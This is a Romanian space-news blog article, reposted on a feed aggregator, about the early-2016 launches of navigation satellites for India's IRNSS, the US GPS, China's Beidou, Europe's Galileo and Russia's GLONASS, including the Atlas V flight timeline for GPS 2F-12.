India a început în forță anul, cu o lansare a unei rachete PSLV în 20 ianuarie, când a transportat pe orbită al cincilea satelit din constelația IRNSS. Acest sistem va asigura posibilitatea decuplării Indiei de la sistemul global GPS și folosirea unui sistem de localizare regional, propriu. Cu cinci sateliți plasați pe orbită, India mai are nevoie doar de alte două lansări pentru a avea un sistem de localizare funcțional, iar următoarea lansare este programată deja pentru 10 martie, agenția spațială indiană sperând ca până la vară sistemul să fie deja funcțional.

Satelitul IRNSS-1E se află la bordul acestei rachete indiene PSLV (20 ianuarie 2016)

Despre satelitul de 245 de milioane de dolari GPS 2F-12 am mai scris, ultimul satelit din actuala generație de sateliți GPS construiți de Boeing. Lansarea este programată pentru astăzi la ora 15:38, după ce a fost amânată două zile. Șansele ca vremea să fie una favorabilă în momentul ales pentru lansare sunt de doar 40%, însă asta nu înseamnă că acestea pot crește cu câteva ore înainte de momentul zero.

Pentru această misiune, Atlas V vine în configurație 401, adică un con protector al încărcăturii cu diametrul de 4 metri, fără nici un booster suplimentar atașat corpului central și un singur motor al treptei secundare Centaur. Satelitul se va desprinde de Centaur la 3 ore și 23 de minute după lansare, la o altitudine de 20459 km și înclinație orbitală 55 grade. Dacă doriți să urmăriți lansarea în direct, o puteți face folosind site-ul United Launch Alliance. După 1 minut și 18.5 secunde, racheta va atinge Mach 1, viteza sunetului, urmând ca după 4 minute și 3.9 secunde motorul principal să se oprească în urma terminării combustibilului de la bord. Are loc separarea primei trepte după alte 5 secunde și prima pornire a motorului celei de-a doua trepte, care va arde aproape 14 minute. După o pauză de 3 ore, în care satelitul ajunge în poziția dorită, o a doua pornire a motorului treptei Centaur va plasa satelitul și mai aproape de poziția dorită, urmând ca Centaur să se desprindă, moment în care, dacă satelitul este acolo unde trebuie, misiunea poate fi declarată un succes. În prezent, 30 de sateliți GPS sunt în uz: 12 din lotul 2R, 7 din lotul 2R-Ms și 11 din lotul 2F.

Atlas V și GPS 3F-12 sunt gata pentru lansare
Atlas V și GPS 3F-12 sunt gata pentru lansare

Pentru ULA urmează un an aglomerat, următoarea lansare fiind deja programată pentru miercuri, 10 februarie, când o rachetă Delta IV va lansa un satelit de la baza militară din Vandenberg, urmând ca peste o lună, în 10 martie, o nouă rachetă Atlas V să transporte o nouă capsulă Cygnus spre Stația Spațială Internațională. În total, ULA are planificate 15 lansări pentru acest an.

Lansarea satelitului Beidou-21 din 1 februarie 2016
Lansarea satelitului Beidou-21 din 1 februarie 2016

China a inaugurat lansările din luna februarie cu un nou satelit din sistemul propriu de navigație prin satelit, Beidou, declarând acum două zile că intenționează să lanseze 40 de noi astfel de sateliți în următorii 5 ani, 18 dintre ei urmând să fie puși pe orbită până la sfârșitul lui 2018. Treizeci și cinci de astfel de sateliți sunt necesari pentru ca sistemul să fie unul funcțional și în prezent 17 se află deja pe orbită, incluzându-l și pe cel lansat luni. Rețeaua Beidou urmează să ofere o acuratețe de 6 metri pe orizontală și 10 metri pe verticală (altitudine) și dacă deocamdată acoperirea este una regională, China speră ca în 2020 sistemul să devină unul global, la fel cum sunt GPS și cum urmează să fie Galileo și GLONASS.

Din cei 30 de sateliți necesari sistemului european Galilei, 12 se află deja pe orbită, următorii 4 urmând să fie lansați în octombrie de către o rachetă Ariane 5. Dacă până acum racheta Ariane 5 avea obiceiul să lanseze perechi de sateliți Galileo, din acest an Ariane 5 ES va lansa câte 4 astfel de sateliți.

Galileo_launch_on_Soyuz,_21_Oct_2011_(6266227357)
Prima lansare a unei perechi de sateliți Galileo, efectuată de o rachetă Soyuz (21 octombrie 2011)

Însă deocamdată, doar sistemele GPS și GLONASS oferă acoperire cu adevărat globală. Sistemul rusesc are nevoie de 24 de sateliți activi pentru a deservi întreg globul, în timp ce un număr de 18 sateliți sunt suficienți pentru a acoperi teritoriul Rusiei, ultima lansare având loc în 2014. Deși funcțional, sistemul are mereu nevoie de sateliți noi, pentru a-i înlocui pe cei care urmează să fie retrași, așa că Rusia plănuiește o nouă lansare peste doar câteva zile, duminică, folosit un lansator Soyuz 2-1b.

Așadar, după o avanpremieră indiană în 20 ianuarie, China a început luna februarie cu o lansare Beidou, urmată de ultimul satelit GPS de a doua generație, continuând cu GLONASS-M la bordul unei rachete Soyuz și încheiem această perioadă activă pentru sateliții de geolocalizare în 10 martie, tot cu o lansare PSLV din India.

Articolul Zodia sateliților de geolocație apare prima dată în parsec.ro.

linux360 Feed Aggregator

linux360 Feed Aggregator

Abonează-te

RSS 1.0
RSS 2.0
ATOM
FOAF
OPML 1.0
OPML 2.0

Ultima actualizare

sâmbătă 13 februarie 2016, 19:01
ora Bucureştiului


Adăugare feed

nabps (at) linux360 (dot) ro

Powered by Red Hat Enterprise Linux AS Folosim serviciile ETP Consulting